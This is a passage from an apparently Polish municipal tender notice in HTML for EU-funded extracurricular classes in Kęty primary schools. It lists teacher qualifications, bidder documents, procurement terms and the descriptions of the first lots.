a)w roku szkolnym  2011/2012 - 30 godzin zajęć dla grupy I- 6 uczniów, w roku szkolnym 2012/2013 30 godzin zajęć dla grupy I- 6 uczniów, w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy I- 6 uczniów
b)w roku szkolnym  2011/2012 - 30 godzin zajęć dla grupy II- 6 uczniów, w roku szkolnym  2012/2013 -  30 godzin zajęć dla grupy II- 6 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla grupy II- 6 uczniów,
2.Zajęcia logopedyczne - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 4 uczniów, w roku szkolnym  2012/2013- 30 godzin zajęć dla 4 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 4 uczniów,
3.Zajęcia - gimnastyka korekcyjna -  w roku szkolnym  2011/2012 - 30 godzin zajęć dla 12 uczniów, w roku szkolnym  2012/2013 - 30 godzin zajęć dla 12 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 12 uczniów,
4.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych z uwzględnieniem nauk matematyczno- przyrodniczych:  w roku szkolnym  2011/2012 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2012/2013 - 30 godzin zajęć dla 5 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 5 uczniów,
5.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych teatralnie - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów,
6.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - język angielski - w roku szkolnym  2011/2012 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2012/2013 - 30 godzin zajęć dla 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla 8 uczniów,

7.Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych polonistycznie: 
a)w roku szkolnym  2011/2012 - 30 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2012/2013 30 godzin zajęć dla grupy I- 8 uczniów, w roku szkolnym 2013/2014 - 30 godzin zajęć dla grupy I- 8 uczniów
b)w roku szkolnym  2011/2012 - 30 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2012/2013 -  30 godzin zajęć dla grupy II- 8 uczniów, w roku szkolnym  2013/2014 - 30 godzin zajęć dla grupy II- 8 uczniów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 146.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Ocena spełnienia tego warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Każdy wykonawca usługi powinien posiadać stopień awansu zawodowego minimum nauczyciela kontraktowego.
2. Wykonawcy poszczególnych zadań muszą spełniać następujące wymogi dotyczące
wykształcenia:
Zadanie I.1od a) do t); I.4 od a) do r); I.5 a), b), c) - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej 

Zadanie I.2 od a) do h). - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie I.3 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia w zakresie pedagogiki specjalnej - oligofrenopedagogiki oraz studia podyplomowe w zakresie profilaktyki i terapii zaburzeń emocjonalnych lub studia podyplomowe/kurs kwalifikacyjny z zakresu terapii pedagogicznej

Zadanie I.6 a), b) - wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie zintegrowanej edukacji wczesnoszkolnej i wychowania przedszkolnego z języka angielskiego lub wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie filologii angielskiej lub wykształcenie wyższe z przygotowaniem pedagogicznym oraz posiadanie certyfikatu CAE 

Zadanie II.1 od a) do u); II.2 od a) do i); II5 od a) do f); - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej 

Zadanie II.3 od a) do f); - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii lub studia podyplomowe logopedia z elementami nurologopedii

Zadanie II.4. - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie II.6 od a) do f); - wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie zintegrowanej edukacji wczesnoszkolnej i wychowania przedszkolnego z języka angielskiego lub wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie filologii angielskiej lub wykształcenie wyższe z przygotowaniem pedagogicznym oraz posiadanie certyfikatu CAE 

Zadanie III.1a),b),c); III.2 a),b),c); III.5 a),b); III6 a),b); - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej

Zadanie III.3 a),b),c); - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie III.4 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia w zakresie pedagogiki specjalnej - oligofrenopedagogiki oraz studia podyplomowe w zakresie profilaktyki i terapii zaburzeń emocjonalnych lub studia podyplomowe/kurs kwalifikacyjny z zakresu terapii pedagogicznej


Zadanie IV.1 od a) do c); IV.2 a), b); IV3, IV4 a), b); IV5 wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej

Zadanie V.1, V.2, V5, V6 - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej

Zadanie V.3 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii lub studia podyplomowe logopedia z elementami nurologopedii

Zadanie V.4 -wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie VI.1, VI.2, VI.5- wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej 

Zadanie VI.3 - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach szkoły podstawowej oraz kurs kwalifikacyjny -terapia pedagogiczna

Zadanie VI.4 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie VII.1, VII.2, VII.4, - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej 

Zadanie VII.3 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie VIII.1 a), b); VIII.2- wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej

Zadanie VIII.3 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie IX.1 a), b); IX.4; IX.5; IX.7 a), b);  - wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczanie w klasach I-III szkoły podstawowej

Zadanie IX.2 - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii lub studia podyplomowe logopedia z elementami nurologopedii

Zadanie IX.3, - wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie gimnastyki korekcyjnej lub studia podyplomowe korekcje wad postawy lub ukończony kurs z zakresu gimnastyki korekcyjno - kompensacyjnej w szkole podstawowej lub kurs kwalifikacyjny z zakresu gimnastyki korekcyjnej

Zadanie IX.6, - wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie zintegrowanej edukacji wczesnoszkolnej i wychowania przedszkolnego z języka angielskiego lub wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie filologii angielskiej lub wykształcenie wyższe z przygotowaniem pedagogicznym oraz posiadanie certyfikatu CAE</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Ocena spełnienia tego warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Wykonawca w celu potwierdzenia dysponowania osobami zdolnymi do wykonania danego zadania w zamówieniu musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności co najmniej jedną osobą posiadającą kwalifikacje wymienione w pkt V.2). Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich wykształcenia, niezbędnych do wykonania zamówienia wypełniony wg załącznika nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Ocena spełnienia tego warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo Zamówień Publicznych - zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Inne dokumenty:
a)umowę spółki cywilnej, jeżeli działalność gospodarcza przedsiębiorców jest prowadzona w formie spółki cywilnej, wówczas wymagane oświadczenie o braku podstaw do wykluczenia (opisane w punkcie 2 ppkt a)) w zakresie art. 24 ust. 1 ustawy Prawo zamówień publicznych składa każdy z przedsiębiorców, a zaświadczenia opisane w punkcie 2 ppkt c) i d) winny zostać złożone za spółkę cywilną oraz za każdego ze wspólników spółki;
b)wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli dotyczy) - druk wykazu stanowi załącznik nr 6 do SIWZ;
c)upoważnienie do sporządzenia i podpisania oferty, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
2.Wymagania stawiane wykonawcom wspólnie ubiegającym się o udzielenie zamówienia (konsorcja):
a)do oferty musi być dołączone pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, wystawione zgodnie z wymogami ustawowymi i podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów;
b)oferta winna być podpisana przez każdego partnera lub ustanowionego pełnomocnika;
c)ustanowiony pełnomocnik do zawarcia umowy winien być upoważniony do zaciągania zobowiązań 
i płatności w imieniu każdego partnera, na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, 
w następującym zakresie i przy spełnieniu następujących warunków:
a)zmiana okresu realizacji umowy, o którym mowa w § 4 umowy, jest możliwa wyłącznie za zgodą obu stron umowy;
b)zmniejszenie wartości umowy, o której mowa w § 2 ust. 1 umowy, jest możliwe wyłącznie za zgodą obu stron umowy;
c)w przypadku wystąpienia siły wyższej  możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
2.Zmiany umowy, o których mowa w ust. 2 umowy, nie mogą powodować zwiększenia wartości umowy, o której mowa w § 2 ust. 1umowy.
Zmiany umowy, o których mowa w ust. 2 umowy, wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kety.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kęty, Rynek 7, 32-650 Kęty pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 09:45, miejsce: Urząd Gminy Kęty, Rynek 7, 32-650 Kęty, (dziennik podawczy).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Kęty nr WND-POKL.09.01.02-12-108/11 realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. Projekt współfinansowany jest ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
a)w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy I - 7 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy I - 7 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji    i harmonogramem), w terminie maksymalnym do 30.06.2012 r. 
b)decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
b)w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy II - 7 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy II - 7 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji                              i harmonogramem), w terminie maksymalnym do 30.06.2012 r. 
b)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
c)w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy III - 7 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy III - 7 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji  i harmonogramem), w terminie maksymalnym do 30.06.2012r. 
b)decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
d)w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy IV - 7 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy IV - 7 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji  i harmonogramem), w terminie maksymalnym do 30.06.2012r. 
b)decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
e)w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy V - 7 uczniów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2011/2012 -  42 godzin zajęć dla grupy V - 7 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
a)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji                              i harmonogramem), w terminie maksymalnym do 30.06.2012r. 
b)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
c)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
d)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
e)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
f)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
f)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 5 uczniów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy I - 5 uczniów.
Zleceniobiorca przyjmuje do wykonania czynności związane z realizacją projektu:
g)	prowadzenie zajęć pozalekcyjnych (zgodnie z projektem, regulaminem rekrutacji                              i harmonogramem), w terminie maksymalnym do 30.06.2013r. 
h)	decydowanie o doborze form, metod i środków dydaktycznych do prowadzenia zajęć;
i)	prowadzenie dziennika zajęć pozalekcyjnych oraz ewaluacji prowadzonych zajęć
j)	opracowanie planu pracy zajęć pozalekcyjnych i przedstawienie do akceptacji dyrektorowi szkoły i koordynatorowi projektu;
k)	informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego;
l)	przestrzeganie regulaminu pracowni, w której prowadzone będą zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr I. Szkoła Podstawowa nr 1 w Kętach Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
g)w roku szkolnym 2012/2013 - 30 godzin zajęć dla grupy II - 5 uczniów.</p>
